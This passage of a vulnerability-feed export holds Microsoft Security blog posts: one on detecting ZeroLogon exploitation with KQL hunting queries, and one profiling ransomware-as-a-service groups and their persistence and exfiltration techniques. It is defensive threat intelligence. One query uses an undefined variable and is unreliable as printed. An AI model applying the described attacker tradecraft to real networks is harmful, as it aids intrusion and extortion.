"mmpc", "title": "Microsoft investigates Iranian attacks against the Albanian government", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2021-26855"], "modified": "2022-09-08T15:00:00", "id": "MMPC:4C62BE50213C7726C383DAD096CBBB99", "href": "https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-02T21:51:37", "description": "There has been a huge focus on the recently patched CVE-2020-1472 Netlogon Elevation of Privilege vulnerability, widely known as ZeroLogon. While Microsoft strongly recommends that you deploy the latest security updates to your servers and devices, we also want to provide you with the best detection coverage possible for your domain controllers. [Microsoft Defender for Identity](<https://www.microsoft.com/en-us/microsoft-365/security/identity-defender>) along with other [Microsoft 365 Defender](<https://aka.ms/m365d>) solutions detect adversaries as they try to exploit this vulnerability against your domain controllers.\n\n## Here is a sneak peek into our detection lifecycle\n\nWhenever a vulnerability or attack surface is disclosed, our research teams immediately investigate exploits and produce various methods for detecting attacks. This is highlighted in our response to suspected [WannaCry](<https://docs.microsoft.com/en-us/defender-for-identity/compromised-credentials-alerts#suspected-wannacry-ransomware-attack-external-id-2035>) attacks and with the alert for [Suspected SMB (Server Message Block) packet manipulation](<https://docs.microsoft.com/en-us/azure-advanced-threat-protection/lateral-movement-alerts#suspected-smb-packet-manipulation-cve-2020-0796-exploitation---preview-external-id-2406>) (CVE-2020-0796 exploitation). These detection methods are tested in our lab environment, and experimental detectors are deployed to Microsoft Defender for Identity to assess performance and accuracy and find possible attacker activity.\n\nOver the past two months since CVE-2020-1472 was first disclosed, interest in this detection rapidly increased. This happened even if we did not observe any activity matching exploitation of this vulnerability in the initial weeks after the August security updates. It generally takes a while before disclosed vulnerabilities are successfully reverse-engineered and corresponding mechanisms are built.\n\nThis lack of activity changed on September 13, when we triggered a surge in alerts. Simultaneously, this increase in activity was followed by the publication of several proof-of-concept tools and demo exploits that can leverage the vulnerability.\n\n\n\n_Figure 1: Orgs with ZeroLogon exploitation attempts by red teams and real attackers starting September 13, 2020_\n\nMicrosoft Defender for Identity can detect this vulnerability early on. It covers both the aspects of exploitation and traffic inspection of the Netlogon channel.\n\n\n\n_Figure 2: Alert page experience_\n\nWith this Microsoft Defender for Identity alert, you will be able to identify:\n\n * The device that attempted the impersonation.\n * The domain controller.\n * The targeted asset.\n * Whether the impersonation attempts were successful.\n\nFinally, customers using [Microsoft 365 Defende](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>)r can take full advantage of the power of the signals and alerts from Microsoft Defender for Identity, combined with behavioral events and detections from [Microsoft Defender for Endpoint.](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) This coordinated protection enables you not just to observe Netlogon exploitation attempts over network protocols, but also to see device process and file activity associated with the exploitation.\n\n## A close look at some of the earliest ZeroLogon attacks\n\nZeroLogon is a powerful vulnerability for attackers to leverage, but in a normal attack scenario, it will require an initial entry vector inside an organization to facilitate exploitation against domain controllers. During initial monitoring of security signals, [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) observed ZeroLogon exploitation activity in multiple organizations. In many cases, it was clear that the activity was originated from red teams or pen testers using automated vulnerability scanners to locate vulnerable servers. However, Microsoft researchers were also able to identify a few limited cases of real attackers jumping on the ZeroLogon train to expand their perimeter into organizations that, after a month of a patch being available, were still running unpatched domain controllers.\n\n\n\n_Figure 3: Typical Zerologon exploitation activity generated by a vulnerability scanner or a red team testing domain controller at scale_\n\nOne of the adversaries noticed by our analysts was interesting because the attacker leveraged an older vulnerability for SharePoint (CVE-2019-0604) to exploit remotely unpatched servers (typically Windows Server 2008 and Windows Server 2012) and then implant a web shell to gain persistent access and code execution. Following the web shell installation, this attacker quickly deployed a Cobalt Strike based payload and immediately started exploring the network perimeter and targeting domain controllers found with the ZeroLogon exploit.\n\nUsing the @MsftSecIntel Twitter handle, we [publicly shared some file indicators](<https://twitter.com/MsftSecIntel/status/1308941504707063808>) used during the attack. We also shared the variations of the ZeroLogon exploits we detected, many of which were recompiled versions of well-known, publicly available proof-of-concept code. Microsoft Defender for Endpoint can also detect certain file-based versions of the CVE-2020-1472 exploit when executed on devices protected by Microsoft Defender for Endpoints.\n\n\n\n## Hunting for ZeroLogon in Microsoft 365 Defender\n\nCombining signals from Microsoft Defender for Endpoint with the ZeroLogon alerts from Microsoft Defender for Identity can help assess the nature of the alert quickly. Microsoft 365 Defender automatically leverages signals from both products. It has logic that constantly attempts to combine alerts and events using a variety of correlation logic based on knowledge of cause-effect attack flows, the MITRE ATT&amp;CK framework, and machine learning models.\n\nIn this section, we provide an example (in the simplified form of an [advanced hunting query](<https://docs.microsoft.com/en-gb/microsoft-365/security/mtp/advanced-hunting-overview?view=o365-worldwide>)) of how Microsoft 365 Defender correlation logic operates behind-the-scenes to combine alerts, reducing Security Operations Centers (SOC) fatigue and facilitating investigation.\n\nThe following Microsoft 365 Defender advanced hunting queries identify process and network connection details from the source device suspected to have launched the NetLogon exploit.\n\n\n\nFirst, we gather the relevant details on recent Netlogon exploit attempts from Microsoft Defender for Identity alerts. This will help populate the AlertId for the second query.\n\n`// Find all Netlogon exploit attempt alerts containing source devices \nlet queryWindow = 3d; \nAlertInfo \n| where Timestamp > ago(queryWindow) \n| where ServiceSource == \"Azure ATP\" \n| where Title == \"Suspected Netlogon privilege elevation attempt (CVE-2020-1472 exploitation)\" \n| join (AlertEvidence \n| where Timestamp > ago(queryWindow) \n| where EntityType == \"Machine\" \n| where EvidenceDirection == \"Source\" \n| where isnotempty(DeviceId) \n) on AlertId \n| summarize by AlertId, DeviceId, Timestamp`\n\nNext, populate one AlertId from the prior query into NLAlertId in the next query to hunt for the likely process that launched the exploit and its network connection to the domain controller:\n\n`// Find potential endpoint Netlogon exploit evidence from AlertId \nlet NLAlertId = \"insert alert ID here\"; \nlet lookAhead = 1m; \nlet lookBehind = 6m; \nlet NLEvidence = AlertEvidence \n| where AlertId == NLAlertId \n| where EntityType == \"Machine\" \n| where EvidenceDirection == \"Source\" \n| where isnotempty(DeviceId) \n| summarize Timestamp=arg_min(Timestamp, *) by DeviceId; \nlet sourceMachine = NLEvidence | distinct DeviceId; \nlet alertTime = todatetime(toscalar(ZLEvidence | distinct Timestamp)); \nDeviceNetworkEvents \n| where Timestamp between ((alertTime - lookBehind) .. (alertTime + lookAhead)) \n| where DeviceId in (sourceMachine) \n| where RemotePort == 135 or RemotePort between (49670 .. 49680) \n| summarize (Timestamp, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountSid)=arg_min(ReportId, Timestamp, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountSid), TargetDevicePorts=make_set(RemotePort) by DeviceId, DeviceName, RemoteIP, RemoteUrl \n| project-rename SourceComputerName=DeviceName, SourceDeviceId=DeviceId, TargetDeviceIP=RemoteIP, TargetComputerName=RemoteUrl`\n\nThis query can return a result that looks like this:\n\n\n\nTying Microsoft Defender for Endpoint data together with the original Microsoft Defender for Identity alert can give a clearer picture as to what happened on the device suspected of launching the exploit. This could save SOC analysts time when investigating alerts, because the relevant details are there to determine if it was caused by a curious researcher or from an actual attack.\n\n## Defend against ZeroLogon\n\nLearn more about the [alert here](<https://docs.microsoft.com/en-us/azure-advanced-threat-protection/compromised-credentials-alerts#suspected-netlogon-privilege-elevation-attempt-cve-2020-1472-exploitationexternalid2411>), along with information on all the alerts Defender for Identity uses to help you stay protected from identity-based attacks.\n\nAlso, feel free to review [our guidance ](<https://support.microsoft.com/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>)on managing changes in Netlogon secure channel connections and how you can prevent this vulnerability\n\nCustomers with Microsoft Defender for Endpoint can get additional guidance from[ the threat analytics article ](<https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Fsecuritycenter.windows.com%2Fthreatanalytics3%2Fc57607da-fb94-43f3-b8ba-1acda0242900%2Fanalystreport&data=02%7C01%7CDaniel.Naim%40microsoft.com%7C5a14a796515d428cb11608d86545b735%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637370697507756901&sdata=uxd2wKhtSyqr9A2dqhO9D7YW%2F7MgA%2F3o1WnmWjpmCO8%3D&reserved=0>)available in Microsoft Defender Security Center.\n\n## Get started today\n\nAre you just starting your Microsoft Defender for Identity journey? Begin a trial of [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for your organization.\n\nJoin the [Microsoft Defender for Identity Tech Community ](<https://techcommunity.microsoft.com/t5/Azure-Advanced-Threat-Protection/bd-p/AzureAdvancedThreatProtection>)for the latest updates and news about Identity Security Posture Management assessments, detections, and other updates.\n\nTo learn more about Microsoft Security solutions [visit our website](<https://www.microsoft.com/en-us/security/business/solutions>). Bookmark the [Security blog](<https://www.microsoft.com/security/blog/>) to keep up with our expert coverage on security matters. Also, follow us at [@MSFTSecurity](<https://twitter.com/@MSFTSecurity>) for the latest news and updates on cybersecurity.\n\nThe post [Zerologon is now detected by Microsoft Defender for Identity](<https://www.microsoft.com/security/blog/2020/11/30/zerologon-is-now-detected-by-microsoft-defender-for-identity/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-11-30T17:00:20", "type": "mmpc", "title": "Zerologon is now detected by Microsoft Defender for Identity", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2020-0796", "CVE-2020-1472"], "modified": "2020-11-30T17:00:20", "id": "MMPC:D6D537E875C3CBD84822A868D24B31BA", "href": "https://www.microsoft.com/security/blog/2020/11/30/zerologon-is-now-detected-by-microsoft-defender-for-identity/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T16:00:24", "description": "Microsoft processes 24 trillion signals every 24 hours, and we have blocked billions of attacks in the last year alone. Microsoft Security tracks more than 35 unique ransomware families and 250 unique threat actors across observed nation-state, ransomware, and criminal activities.\n\nThat depth of signal intelligence gathered from various domains\u2014identity, email, data, and cloud\u2014provides us with insight into the gig economy that attackers have created with tools designed to lower the barrier for entry for other attackers, who in turn continue to pay dividends and fund operations through the sale and associated \u201ccut\u201d from their tool\u2019s success.\n\nThe cybercriminal economy is a continuously evolving connected ecosystem of many players with different techniques, goals, and skillsets. In the same way our traditional economy has shifted toward gig workers for efficiency, criminals are learning that there\u2019s less work and less risk involved by renting or selling their tools for a portion of the profits than performing the attacks themselves. This industrialization of the cybercrime economy has made it easier for attackers to use ready-made penetration testing and other tools to perform their attacks.\n\nWithin this category of threats, Microsoft has been tracking the trend in the ransomware-as-a-service (RaaS) gig economy, called [human-operated ransomware](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>), which remains one of the most impactful threats to organizations. We coined the industry term \u201chuman-operated ransomware\u201d to clarify that these threats are driven by humans who make decisions at every stage of their attacks based on what they find in their target\u2019s network.\n\nUnlike the broad targeting and opportunistic approach of earlier ransomware infections, attackers behind these human-operated campaigns vary their attack patterns depending on their discoveries\u2014for example, a security product that isn\u2018t configured to prevent tampering or a service that\u2019s running as a highly privileged account like a domain admin. Attackers can use those weaknesses to elevate their privileges to steal even more valuable data, leading to a bigger payout for them\u2014with no guarantee they\u2019ll leave their target environment once they\u2019ve been paid. Attackers are also often more determined to stay on a network once they gain access and sometimes repeatedly monetize that access with additional attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nRansomware attacks have become even more impactful in recent years as more ransomware-as-a-service ecosystems have adopted the double extortion monetization strategy. All ransomware is a form of extortion, but now, attackers are not only encrypting data on compromised devices but also exfiltrating it and then posting or threatening to post it publicly to pressure the targets into paying the ransom. Most ransomware attackers opportunistically deploy ransomware to whatever network they get access to, and some even purchase access to networks from other cybercriminals. Some attackers prioritize organizations with higher revenues, while others prefer specific industries for the shock value or type of data they can exfiltrate.\n\nAll human-operated ransomware campaigns\u2014all human-operated attacks in general, for that matter\u2014share common dependencies on security weaknesses that allow them to succeed. Attackers most commonly take advantage of **an organization\u2019s poor credential hygiene and legacy configurations or misconfigurations to find easy entry and privilege escalation points in an environment.** \n\nIn this blog, we detail several of the ransomware ecosystems using the RaaS model, the importance of cross-domain visibility in finding and evicting these actors, and best practices organizations can use to protect themselves from this increasingly popular style of attack. We also offer security best practices on credential hygiene and cloud hardening, how to address security blind spots, harden internet-facing assets to understand your perimeter, and more. Here\u2019s a quick table of contents:\n\n 1. **How RaaS redefines our understanding of ransomware incidents**\n * The RaaS affiliate model explained\n * Access for sale and mercurial targeting\n 2. **\u201cHuman-operated\u201d means human decisions**\n * Exfiltration and double extortion\n * Persistent and sneaky access methods\n 3. **Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks**\n 4. **Defending against ransomware: Moving beyond protection by detection**\n * Building credential hygiene\n * Auditing credential exposure\n * Prioritizing deployment of Active Directory updates\n * Cloud hardening\n * Addressing security blind spots\n * Reducing the attack surface\n * Hardening internet-facing assets and understanding your perimeter\n\n## How RaaS redefines our understanding of ransomware incidents\n\nWith ransomware being the preferred method for many cybercriminals to monetize attacks, human-operated ransomware remains one of the most impactful threats to organizations today, and it only continues to evolve. This evolution is driven by the \u201chuman-operated\u201d aspect of these attacks\u2014attackers make informed and calculated decisions, resulting in varied attack patterns tailored specifically to their targets and iterated upon until the attackers are successful or evicted.\n\nIn the past, we\u2019ve observed a tight relationship between the initial entry vector, tools, and ransomware payload choices in each campaign of one strain of ransomware. The RaaS affiliate model, which has allowed more criminals, regardless of technical expertise, to deploy ransomware built or managed by someone else, is weakening this link. As ransomware deployment becomes a gig economy, it has become more difficult to link the tradecraft used in a specific attack to the ransomware payload developers.\n\nReporting a ransomware incident by assigning it with the payload name gives the impression that a monolithic entity is behind all attacks using the same ransomware payload and that all incidents that use the ransomware share common techniques and infrastructure. However, focusing solely on the ransomware stage obscures many stages of the attack that come before, including actions like data exfiltration and additional persistence mechanisms, as well as the numerous detection and protection opportunities for network defenders.\n\nWe know, for example, that the underlying techniques used in human-operated ransomware campaigns haven\u2019t changed very much over the years\u2014attacks still prey on the same security misconfigurations to succeed. Securing a large corporate network takes disciplined and sustained focus, but there\u2019s a high ROI in implementing critical controls that prevent these attacks from having a wider impact, even if it\u2019s only possible on the most critical assets and segments of the network. \n\nWithout the ability to steal access to highly privileged accounts, attackers can\u2019t move laterally, spread ransomware widely, access data to exfiltrate, or use tools like Group Policy to impact security settings. Disrupting common attack patterns by applying security controls also reduces alert fatigue in security SOCs by stopping the attackers before they get in. This can also prevent unexpected consequences of short-lived breaches, such as exfiltration of network topologies and configuration data that happens in the first few minutes of execution of some trojans.\n\nIn the following sections, we explain the RaaS affiliate model and disambiguate between the attacker tools and the various threat actors at play during a security incident. Gaining this clarity helps surface trends and common attack patterns that inform defensive strategies focused on preventing attacks rather than detecting ransomware payloads. Threat intelligence and insights from this research also enrich our solutions like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), whose comprehensive security capabilities help protect customers by detecting RaaS-related attack attempts.\n\n### The RaaS affiliate model explained\n\nThe cybercriminal economy\u2014a connected ecosystem of many players with different techniques, goals, and skillsets\u2014is evolving. The industrialization of attacks has progressed from attackers using off-the-shelf tools, such as Cobalt Strike, to attackers being able to purchase access to networks and the payloads they deploy to them. This means that the impact of a successful ransomware and extortion attack remains the same regardless of the attacker\u2019s skills.\n\nRaaS is an arrangement between an operator and an affiliate. The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. The RaaS program may also include a leak site to share snippets of data exfiltrated from victims, allowing attackers to show that the exfiltration is real and try to extort payment. Many RaaS programs further incorporate a suite of extortion support offerings, including leak site hosting and integration into ransom notes, as well as decryption negotiation, payment pressure, and cryptocurrency transaction services\n\nRaaS thus gives a unified appearance of the payload or campaign being a single ransomware family or set of attackers. However, what happens is that the RaaS operator sells access to the ransom payload and decryptor to an affiliate, who performs the intrusion and privilege escalation and who is responsible for the deployment of the actual ransomware payload. The parties then split the profit. In addition, RaaS developers and operators might also use the payload for profit, sell it, and run their campaigns with other ransomware payloads\u2014further muddying the waters when it comes to tracking the criminals behind these actions.\n\nFigure 1. How the RaaS affiliate model enables ransomware attacks\n\n### Access for sale and mercurial targeting\n\nA component of the cybercriminal economy is selling access to systems to other attackers for various purposes, including ransomware. Access brokers can, for instance, infect systems with malware or a botnet and then sell them as a \u201cload\u201d. A load is designed to install other malware or backdoors onto the infected systems for other criminals. Other access brokers scan the internet for vulnerable systems, like exposed Remote Desktop Protocol (RDP) systems with weak passwords or unpatched systems, and then compromise them _en masse_ to \u201cbank\u201d for later profit. Some advertisements for the sale of initial access specifically cite that a system isn\u2019t managed by an antivirus or endpoint detection and response (EDR) product and has a highly privileged credential such as Domain Administrator associated with it to fetch higher prices.\n\nMost ransomware attackers opportunistically deploy ransomware to whatever network they get access to. Some attackers prioritize organizations with higher revenues, while some target specific industries for the shock value or type of data they can exfiltrate (for example, attackers targeting hospitals or exfiltrating data from technology companies). In many cases, the targeting doesn\u2019t manifest itself as specifically attacking the target\u2019s network, instead, the purchase of access from an access broker or the use of existing malware infection to pivot to ransomware activities.\n\nIn some ransomware attacks, the affiliates who bought a load or access may not even know or care how the system was compromised in the first place and are just using it as a \u201cjump server\u201d to perform other actions in a network. Access brokers often list the network details for the access they are selling, but affiliates aren\u2019t usually interested in the network itself but rather the monetization potential. As a result, some attacks that seem targeted to a specific industry might simply be a case of affiliates purchasing access based on the number of systems they could deploy ransomware to and the perceived potential for profit.\n\n## \u201cHuman-operated\u201d means human decisions\n\nMicrosoft coined the term \u201chuman-operated ransomware\u201d to clearly define a class of attacks driven by expert human intelligence at every step of the attack chain and culminate in intentional business disruption and extortion. Human-operated ransomware attacks share commonalities in the security misconfigurations of which they take advantage and the manual techniques used for lateral movement and persistence. However, the human-operated nature of these actions means that variations in attacks\u2014including objectives and pre-ransom activity\u2014evolve depending on the environment and the unique opportunities identified by the attackers.\n\nThese attacks involve many reconnaissance activities that enable human operators to profile the organization and know what next steps to take based on specific knowledge of the target. Many of the initial access campaigns that provide access to RaaS affiliates perform automated reconnaissance and exfiltration of information collected in the first few minutes of an attack.\n\nAfter the attack shifts to a hands-on-keyboard phase, the reconnaissance and activities based on this knowledge can vary, depending on the tools that come with the RaaS and the operator\u2019s skill. Frequently attackers query for the currently running security tools, privileged users, and security settings such as those defined in Group Policy before continuing their attack. The data discovered via this reconnaissance phase informs the attacker\u2019s next steps.\n\nIf there\u2019s minimal security hardening to complicate the attack and a highly privileged account can be gained immediately, attackers move directly to deploying ransomware by editing a Group Policy. The attackers take note of security products in the environment and attempt to tamper with and disable these, sometimes using scripts or tools provided with RaaS purchase that try to disable multiple security products at once, other times using specific commands or techniques performed by the attacker. \n\nThis human decision-making early in the reconnaissance and intrusion stages means that even if a target\u2019s security solutions detect specific techniques of an attack, the attackers may not get fully evicted from the network and can use other collected knowledge to attempt to continue the attack in ways that bypass security controls. In many instances, attackers test their attacks \u201cin production\u201d from an undetected location in their target\u2019s environment, deploying tools or payloads like commodity malware. If these tools or payloads are detected and blocked by an antivirus product, the attackers simply grab a different tool, modify their payload, or tamper with the security products they encounter. Such detections could give SOCs a false sense of security that their existing solutions are working. However, these could merely serve as a smokescreen to allow the attackers to further tailor an attack chain that has a higher probability of success. Thus, when the attack reaches the active attack stage of deleting backups or shadow copies, the attack would be minutes away from ransomware deployment. The adversary would likely have already performed harmful actions like the exfiltration of data. This knowledge is key for SOCs responding to ransomware: prioritizing investigation of alerts or detections of tools like Cobalt Strike and performing swift remediation actions and incident response (IR) procedures are critical for containing a human adversary before the ransomware deployment stage.\n\n### Exfiltration and double extortion\n\nRansomware attackers often profit simply by disabling access to critical systems and causing system downtime. Although that simple technique often motivates victims to pay, it is not the only way attackers can monetize their access to compromised networks. Exfiltration of data and \u201cdouble extortion,\u201d which refers to attackers threatening to leak data if a ransom hasn\u2019t been paid, has also become a common tactic among many RaaS affiliate programs\u2014many of them offering a unified leak site for their affiliates. Attackers take advantage of common weaknesses to exfiltrate data and demand ransom without deploying a payload.\n\nThis trend means that focusing on protecting against ransomware payloads via security products or encryption, or considering backups as the main defense against ransomware, instead of comprehensive hardening, leaves a network vulnerable to all the stages of a human-operated ransomware attack that occur before ransomware deployment. This exfiltration can take the form of using tools like Rclone to sync to an external site, setting up email transport rules, or uploading files to cloud services. With double extortion, attackers don\u2019t need to deploy ransomware and cause downtime to extort money. Some attackers have moved beyond the need to deploy ransomware payloads and are shifting straight to extortion models or performing the destructive objectives of their attacks by directly deleting cloud resources. One such extortion attackers is DEV-0537 (also known as LAPSUS$), which is profiled below. \n\n### Persistent and sneaky access methods\n\nPaying the ransom may not reduce the risk to an affected network and potentially only serves to fund cybercriminals. Giving in to the attackers\u2019 demands doesn\u2019t guarantee that attackers ever \u201cpack their bags\u201d and leave a network. Attackers are more determined to stay on a network once they gain access and sometimes repeatedly monetize attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nThe handoff between different attackers as transitions in the cybercriminal economy occur means that multiple attackers may retain persistence in a compromised environment using an entirely different set of tools from those used in a ransomware attack. For example, initial access gained by a banking trojan leads to a Cobalt Strike deployment, but the RaaS affiliate that purchased the access may choose to use a less detectable remote access tool such as TeamViewer to maintain persistence on the network to operate their broader series of campaigns. Using legitimate tools and settings to persist versus malware implants such as Cobalt Strike is a popular technique among ransomware attackers to avoid detection and remain resident in a network for longer.\n\nSome of the common enterprise tools and techniques for persistence that Microsoft has observed being used include:\n\n * AnyDesk\n * Atera Remote Management\n * ngrok.io\n * Remote Manipulator System\n * Splashtop\n * TeamViewer\n\nAnother popular technique attackers perform once they attain privilege access is the creation of new backdoor user accounts, whether local or in Active Directory. These newly created accounts can then be added to remote access tools such as a virtual private network (VPN) or Remote Desktop, granting remote access through accounts that appear legitimate on the network. Ransomware attackers have also been observed editing the settings on systems to enable Remote Desktop, reduce the protocol\u2019s security, and add new users to the Remote Desktop Users group.\n\nThe time between initial access to a hands-on keyboard deployment can vary wildly depending on the groups and their workloads or motivations. Some activity groups can access thousands of potential targets and work through these as their staffing allows, prioritizing based on potential ransom payment over several months. While some activity groups may have access to large and highly resourced companies, they prefer to attack smaller companies for less overall ransom because they can execute the attack within hours or days. In addition, the return on investment is higher from companies that can\u2019t respond to a major incident. Ransoms of tens of millions of dollars receive much attention but take much longer to develop. Many groups prefer to ransom five to 10 smaller targets in a month because the success rate at receiving payment is higher in these targets. Smaller organizations that can\u2019t afford an IR team are often more likely to pay tens of thousands of dollars in ransom than an organization worth millions of dollars because the latter has a developed IR capability and is likely to follow legal advice against paying. In some instances, a ransomware associate threat actor may have an implant on a network and never convert it to ransom activity. In other cases, initial access to full ransom (including handoff from an access broker to a RaaS affiliate) takes less than an hour.\n\nFigure 2. Human-operated ransomware targeting and rate of success, based on a sampling of Microsoft data over six months between 2021 and 2022\n\nThe human-driven nature of these attacks and the scale of possible victims under control of ransomware-associated threat actors underscores the need to take targeted proactive security measures to harden networks and prevent these attacks in their early stages.\n\n## Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks\n\nFor organizations to successfully respond to evict an active attacker, it\u2019s important to understand the active stage of an ongoing attack. In the early attack stages, such as deploying a banking trojan, common remediation efforts like isolating a system and resetting exposed credentials may be sufficient. As the attack progresses and the attacker performs reconnaissance activities and exfiltration, it\u2019s important to implement an incident response process that scopes the incident to address the impact specifically. Using a threat intelligence-driven methodology for understanding attacks can assist in determining incidents that need additional scoping.\n\nIn the next sections, we provide a deep dive into the following prominent ransomware threat actors and their campaigns to increase community understanding of these attacks and enable organizations to better protect themselves:\n\n * DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today \n * ELBRUS: (Un)arrested development\n * DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n * DEV-0237: Prolific collaborator\n * DEV-0206 and DEV-0243: An \u201cevil\u201d partnership\n * DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate\n * DEV-0537: From extortion to destruction\n\nMicrosoft threat intelligence directly informs our products as part of our commitment to track adversaries and protect customers. Microsoft 365 Defender customers should prioritize alerts titled \u201cRansomware-linked emerging threat activity group detected\u201d. We also add the note \u201cOngoing hands-on-keyboard attack\u201d to alerts that indicate a human attacker is in the network. When these alerts are raised, it\u2019s highly recommended to initiate an incident response process to scope the attack, isolate systems, and regain control of credentials attackers may be in control of.\n\nA note on threat actor naming: as part of Microsoft\u2019s ongoing commitment to track both nation-state and cybercriminal threat actors, we refer to the unidentified threat actors as a \u201cdevelopment group\u201d. We use a naming structure with a prefix of \u201cDEV\u201d to indicate an emerging threat group or unique activity during investigation. When a nation-state group moves out of the DEV stage, we use chemical elements (for example, PHOSPHOROUS and NOBELIUM) to name them. On the other hand, we use volcano names (such as ELBRUS) for ransomware or cybercriminal activity groups that have moved out of the DEV state. In the cybercriminal economy, relationships between groups change very rapidly. Attackers are known to hire talent from other cybercriminal groups or use \u201ccontractors,\u201d who provide gig economy-style work on a limited time basis and may not rejoin the group. This shifting nature means that many of the groups Microsoft tracks are labeled as DEV, even if we have a concrete understanding of the nature of the activity group.\n\n### DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today\n\nA vast amount of the current cybercriminal economy connects to a nexus of activity that Microsoft tracks as DEV-0193, also referred to as Trickbot LLC. DEV-0193 is responsible for developing, distributing, and managing many different payloads, including Trickbot, Bazaloader, and AnchorDNS. In addition, DEV-0193 managed the Ryuk RaaS program before the latter\u2019s shutdown in June 2021, and Ryuk\u2019s successor, Conti as well as Diavol. Microsoft has been tracking the activities of DEV-0193 since October 2020 and has observed their expansion from developing and distributing the Trickbot malware to becoming the most prolific ransomware-associated cybercriminal activity group active today. \n\nDEV-0193\u2019s actions and use of the cybercriminal gig economy means they often add new members and projects and utilize contractors to perform various parts of their intrusions. As other malware operations have shut down for various reasons, including legal actions, DEV-0193 has hired developers from these groups. Most notable are the acquisitions of developers from Emotet, Qakbot, and IcedID, bringing them to the DEV-0193 umbrella.\n\nA subgroup of DEV-0193, which Microsoft tracks as DEV-0365, provides infrastructure-as-a-service for cybercriminals. Most notably, DEV-0365 provides Cobalt Strike Beacon-as-a-service. These DEV-0365 Beacons have replaced unique C2 infrastructure in many active malware campaigns. DEV-0193 infrastructure has also been [implicated](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in attacks deploying novel techniques, including exploitation of CVE-2021-40444. \n\nThe leaked chat files from a group publicly labeled as the \u201cConti Group\u201d in February 2022 confirm the wide scale of DEV-0193 activity tracked by Microsoft. Based on our telemetry from 2021 and 2022, Conti has become one of the most deployed RaaS ecosystems, with multiple affiliates concurrently deploying their payload\u2014even as other RaaS ecosystems (DarkSide/BlackMatter and REvil) ceased operations. However, payload-based attribution meant that much of the activity that led to Conti ransomware deployment was attributed to the \u201cConti Group,\u201d even though many affiliates had wildly different tradecraft, skills, and reporting structures. Some Conti affiliates performed small-scale intrusions using the tools offered by the RaaS, while others performed weeks-long operations involving data exfiltration and extortion using their own techniques and tools. One of the most prolific and successful Conti affiliates\u2014and the one responsible for developing the \u201cConti Manual\u201d leaked in August 2021\u2014is tracked as DEV-0230. This activity group also developed and deployed the FiveHands and HelloKitty ransomware payloads and often gained access to an organization via DEV-0193\u2019s BazaLoader infrastructure.\n\n### ELBRUS: (Un)arrested development\n\nELBRUS, also known as FIN7, has been known to be in operation since 2012 and has run multiple campaigns targeting a broad set of industries for financial gain. ELBRUS has deployed point-of-sale (PoS) and ATM malware to collect payment card information from in-store checkout terminals. They have also targeted corporate personnel who have access to sensitive financial data, including individuals involved in SEC filings.\n\nIn 2018, this activity group made headlines when [three of its members were arrested](<https://www.justice.gov/opa/pr/three-members-notorious-international-cybercrime-group-fin7-custody-role-attacking-over-100>). In May 2020, another arrest was made for an individual with alleged involvement with ELBRUS. However, despite law enforcement actions against suspected individual members, Microsoft has observed sustained campaigns from the ELBRUS group itself during these periods.\n\nELBRUS is responsible for developing and distributing multiple 